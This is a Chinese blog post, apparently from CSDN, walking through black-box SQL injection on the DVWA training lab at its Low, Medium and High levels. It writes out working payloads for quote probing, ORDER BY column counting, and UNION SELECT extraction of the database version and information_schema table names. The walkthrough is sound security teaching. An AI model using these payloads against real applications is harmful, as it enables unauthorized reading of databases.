SQL Injection——黑盒测试

于 2023-11-14 15:39:25 发布
阅读量602 收藏
点赞数 14
分类专栏: DVWA靶场——黑盒版 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77370552/article/details/134398393
版权

Low级别:

1.可以看到有一个输入框,提示输入用户id,我们输入1后点击Submit提交数据
回显了一个用户的信息
在这里插入图片描述
2.接着我们在1后面加上一个单引号'测试
Payload:1'
页面报错了,分析报错信息
''1'''最外层的单引号是报错语句提示用,原报错语句为'1'',其中我们输入的部分是1'此时可以看出,我们可控参数位置是在一对单引号之间的
此时语句可能为:SELECT name FROM table id='1''
在这里插入图片描述
3.接着我们进一步测试,构造一个恒真,恒假的语句来判断我们的输入是否影响到了数据库
根据上面猜测的SQL语句,我们的输入位置是被单引号包围的因此我们需要闭合左右两边的单引号
恒真Payload:1' and '1
可以看到页面并没有报错,此时SQL语句可能为SELECT name FROM table WHERE id='1' and '1'语句正确所以并没有报错
在这里插入图片描述
接着我们在测试恒假的情况
恒假Payload:1' and '0
可以看到页面无返回了,此时SQL语句可能为SELECT name FROM table WHERE id='1' and '0'
在这里插入图片描述
语句正确所以没有报错,但是没有满足条件的数据所以就返回空
此时可以确定存在SQL注入漏洞,而且是单引号字符型
4.接着根据SQL注入的流程就到了判断列数的时候了,因为要改变原语句的逻辑,且当前注入点是一个字符型的,所以我们还需要在末尾加上注释符
因为当前输入点是一个输入框所以可以直接使用#接着使用 order by n判断列数
n为任意数字,如果当前表的列数大于n则正常回显,如果小于n则会报错,使用二分法
Payload:1' order by 4#
页面报错了说明当前表的列数小于4
在这里插入图片描述
此时SQL语句可能为SELECT name FROM table WHERE id='1' order by 4 #
接着我们继续使用3来测试,也有错误
在这里插入图片描述
在使用2来测试,可以看到页面回显正常,此时可以确定当前的数据库表有两个字段
在这里插入图片描述
5.接着我们union来爆出数据回显点因为存在两个字段,所以我们构造
Payload:1' union select 1,2#
可以看到数据回显点已经出来了,此时就可以使用MySQL的内置函数,和内置初始库来查询数据库的信息了
在回显点位置替换指定的函数或语句即可
在这里插入图片描述
6.接着为了显示方便观看,将原来正确的数据修改为错误的,只显示我们的union查询的数据,将1改为-1
并且查一下当前数据库,和版本
Payload:-1' union select database(),version()#
可以看到数据已经在会显点显示了
在这里插入图片描述
7.接着我们在查一下dvwa库下的表名
Payload:-1' union select (SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa'),2#
可以看到报错了,说明返回的数据存在多行,此时我们需要使用group_concat(字段名)函数将所有数据组合成一条信息返回
也可以使用limit n,m来一条一条查询信息
在这里插入图片描述
8.这里我们使用group_concat()来组合多条信息为一条返回
Payload:-1' union select (SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='dvwa'),2#
可以看到成功返回了当前数据库下所有的表名
在这里插入图片描述

Medium级别:

1.来到Medium级别可以看到没有输入框,但是可以提交数据
在这里插入图片描述
2.可以提交数据意味着需要发送HTTP请求并且有数据回显,意味着HTTP请求当中一定存在参数,所以关门放Bp
开启浏览器代理,开启Bp,重新提交一次数据,可以看到Bp当中抓到了这个提交数据的请求包,是POST请求并且
下面有参数,此时我们鼠标右键,将其发送到Repeater模块
在这里插入图片描述
3.在Repeater模块,我们可以对一个数据包进行多次重新提交数据包的操作,以方便我们测试
我们将参数改为id参数改为2,接着点击Send发送数据包,在响应模块中点击Render选项卡
可以看到响应的实际情况,可以看到页面正常回显了2好id的信息
在这里插入图片描述
4.接着我们在2后面加一个单引号,发现页面报错,报错信息为'\''我们的单引号被转义了
既然引号被转义,我们直接使用数字型的方法测试
在这里插入图片描述
5.接下来我们直接构造数字型的payload
恒真2 and 3>1可以看到页面正常的返回了信息
在这里插入图片描述
恒假3 and 2=1页面无返回信息,此时可以确定我们输入的数据影响到了系统原有的SQL语句,存在数字型的注入漏洞
在这里插入图片描述
6.根据回显注入的流程,此时就应该判断列数了构造payload:1 order by 3
这里末尾没有使用#是因为,数字型不需要考虑引号闭合的问题
报错了,说明该表没有3列
在这里插入图片描述
7.接着换成2,页面正常返回说明,存在两个字段
在这里插入图片描述
8.接着在查看数据的回显点,为了方便观察,我们将第一个查询的数据显示为空,构造一个不存在的数据
payload:-99 union select 1,2#
此时sql语句可能为,select column from table where id=-99 union select 1,2#
可以看到爆出了数据的回显点,此时就可以在数据回显点上查询数据了
在这里插入图片描述

High级别:

1.点击链接跳出输入框,输入1提交后数据正常回显
在这里插入图片描述
我们直接输入 1 and 0页面没有反应,说明不是数字型注入
在这里插入图片描述
2.输入1'可以看到页面报错了
此时我们猜测我们输入的单引号影响到了原先的SQL语句,但是页面并没有给出有用的报错信息
因此我们需要继续测试
在这里插入图片描述
3.接着我们使用基于单引号的payload测试
恒真Payload:1' and '1可以看到页面回显正常,此时可以确定页面存在基于单引号的字符型注入漏洞
在这里插入图片描述
4.此时我们直接使用order by来判断列数
Payload:1' order by 2#因为这里的注入点是字符型的,所以需要考虑右边引号的闭合问题,因此需要用#注释
可以看到页面返回正常,说明存在两列
在这里插入图片描述
接着在改成 1' order by 3#可以看到又报错了,可以确定存在2列
在这里插入图片描述
5.此时我们就可以使用union查数据了
Payload:-1' union select version(),2#可以看到已经回显了数据库的版本了
在这里插入图片描述
因为MySQL版本大于5.0因此我们可以使用内置库查询的方法查出所有数据,这里我就不再演示

newC0mer
关注
  • 14
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL Injection(Blind)——黑盒测试
2301的博客
11-15 624
DVWA的SQL盲注全级别通关
[ 代码审计篇 ] 代码审计案例详解(一) SQL注入代码审计案例
qq_51577576的博客
12-26 1592
[ 代码审计篇 ] 代码审计案例详解(一) SQL注入代码审计案例 是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程 序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以 此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
【DVWA】2.SQL Injection通关记录(Medium)
Zichel77的博客
10-21 223
Security Level:Medium 1.判断注入点及注入类型 这一等级明显加上了一些限制,用户无法在页面上直接输入,而是限制进行数字的选择 这时就考虑抓包,看看能否在数据包中进行注入语句的构造 找到了id=1这一句,是数字型,看看是不是注入点 右键点击发送至Repeater 构造语句 id=1 and 1=2 可以查询,确定是数字型 用字符型验证一下,构造语句 1' and 1=1# 出错了,结尾的注释符其实可要可不要,Submit=Submit意思就是
DVWA1.10版本 SQL Injection(medium)使用SQLMap注入
monsterdouble的博客
06-26 1881
SQL Injection的low级里是要输入id,将url进行SQLMap注入检测,发现会重定向去登陆页面,抓包看到是Get请求,cookie里有相关值传递过去,进行cookie注入,直接将cookie值复制下来送到SQLMap的参数中就可以一步一步获取数据。sqlmap -u "http://127.0.0.1:8000/dvwa/vulnerabilities/sqli/?id=1&amp...
9.sql injection之中级注入(Medium)-------小白笔记
qwsn
11-03 1942
讲在前面: 1.判断注入点,基于DVWA平台的Medium等级的SQL注入 2.Medium等级在Low等级的基础上,接了一个函数,mysqli_real_escape_string() //注意:该函数是用来转义字符的,起到了过滤的作用 注入过程: 1.使用burpsuite拦截,抓包 //由于,输入框被取消了,只能选择1234等数字,为了注入语句,我们拦截包,抓取到包后,注入语句即可 ...
SQL Injection with MySQL 注入分析
09-14
本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
sql injection(SQL注入)教程
10-25
sql injection(SQL注入)教程 1判断有无sql注入漏洞 2union注入 3盲注 4报错注入 5堆叠注入 6二次注入 ...
php SQL Injection with MySQL
10-28
本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均经过测试。绝对真实。
Advanced SQL Injection with MySQL
09-11
Advanced SQL Injection with MySQL
Advanced SQL Injection.ppt
10-27
SQL相关资料
3.bWAPP SQL注入篇
自强不息
01-23 2758
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
SQL Injection_medium
qq_45434762的博客
12-04 259
1.打开网页进行数据提交发现是POST方式,后面就使用Hackbar进行提交数据 2.使用and 1=1进行判断,发现我们提交的SQL语句被带入数据库执行,说明存在注入点 3.判断列数 使用order by对数据库钟表的列数进行判断,经过测试后可以看出表钟有两列数据 4.判断显示位 是哦那个union select进行判断,我们可以看出1,2都有显示 ...
DVWA - SQL Injection (medium)
qq_42630215的博客
05-28 267
medium级别(手工注入 和 sqlmap工具注入) 手工注入 因为该级别设置了下拉菜单,提交后URL中没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。 1.判断是否存在注入,注入的类型是字符型还是数字型 id=1&Submit=Submit id=1’ &Submit=Submit id=1 and 1=1&Submit=Submit id=1 and 1=2&Submit=Submit 2.猜测字段数 3.确定显示的字段顺序 4.获取当
SQL注入(Medium级别 和high)
weixin_64066158的博客
04-26 956
和前天的low级别注入一样,我们可以先打开源码进行理解和分析 可以看出加入了特殊函数来过滤特殊字符,且变量的单引号不见了,可以分析出有可能为数字型注入; 打开dvwa,可以看到无法输入sql语句进行注入;这时我们要用到Burp suite进行拦截包和sql注入;从而得到我们想要的数据, 此时打开burp suite ,进行拦截并且send to repeater,用repeater进行sql注入和运行 ; 打开repeater 可以看出运行界面和运行界面的源代码(源代码在raw中,我
SQL注入测试
Trouvailless的博客
05-07 7008
0x01 等保测评项 GBT 22239-2019《信息安全技术 网络安全等级保护基本要求》中,8.1.4.4安全计算环境—入侵防范项中要求包括: a)应遵循最小安装的原则,仅安装需要的组件和应用程序; b)应关闭不需要的系统服务、默认共享和高危端口; c)应通过设定终端接入方式或网络地址范围对通过网络进行管理的管理终端进行限制; d)应提供数据有效性检验功能,保证通过人机接口输入或通过通信接口输入的内容符合系统设定要求; e)应能发现可能存在的已知漏洞,并在经过充分测试评估后,及时修补漏洞;
SQL注入手工检测
zzkkoo8的博客
12-15 1万+
1基本检测 2绕过技巧2017年12月14日 09:36:161、基本检测 数字型 $id=@$_GET['id']; //id未经过滤 $sql = "SELECT * FROM sqltest WHERE id='$id'";判断 asp?id=49' //报错 asp?id=49 and 1=1 asp?id=49 and 1=2判断什么型 ?id=1%2b1 //加法减法,可区分数字
SQL注入的测试方法
BORIS HOU的博客
07-11 1万+
简介 Web应用程序的数据存储与读取通过数据库完成,而这些读写的操作通过SQL语句实现。实际项目中可能因为开发人员的疏忽或经验问题,未对用户可输入的参数进行严格地校验,导致用户可能恶意地将SQL命令带入数据库执行,实现注入的目的。 SQL注入的条件 参数中含有SQL语句,并可以带入数据库正常执行 Web应用程序和数据库的交互中,必须有参数加入请求传递至数据库 SQL注入的方法 ...
SQL注入测试总结
热门推荐
07-11 4万+
SQL注入测试总结本文以MySQL数据库为例,其它数据库仅供参考。1 黑盒测试1.1 手工测试Web应用的主要注入点有:① POST请求体中的参数② GET请求头URL中的参数③ Cookie1.1.1 内联注入1、字符串内联注入测试字符串变种预期结果'N/ A触发数据库返回错误。' OR '1' = '1') OR ('1' = '1永真,返回所有行。value' OR '1' = '2valu...
sql injection
最新发布
03-29
SQL injection is a type of cyber attack where an attacker injects malicious SQL statements into a database query through a vulnerable website or application. The goal is to manipulate the database query to access or modify sensitive data, such as usernames, passwords, credit card numbers, or other confidential information. SQL injection attacks are one of the most common types of web application attacks, and they can have severe consequences for individuals and organizations. To prevent SQL injection attacks, developers must use secure coding practices and implement input validation and sanitization techniques. Regular security audits and vulnerability assessments can also help to identify and mitigate SQL injection vulnerabilities.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

newC0mer

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值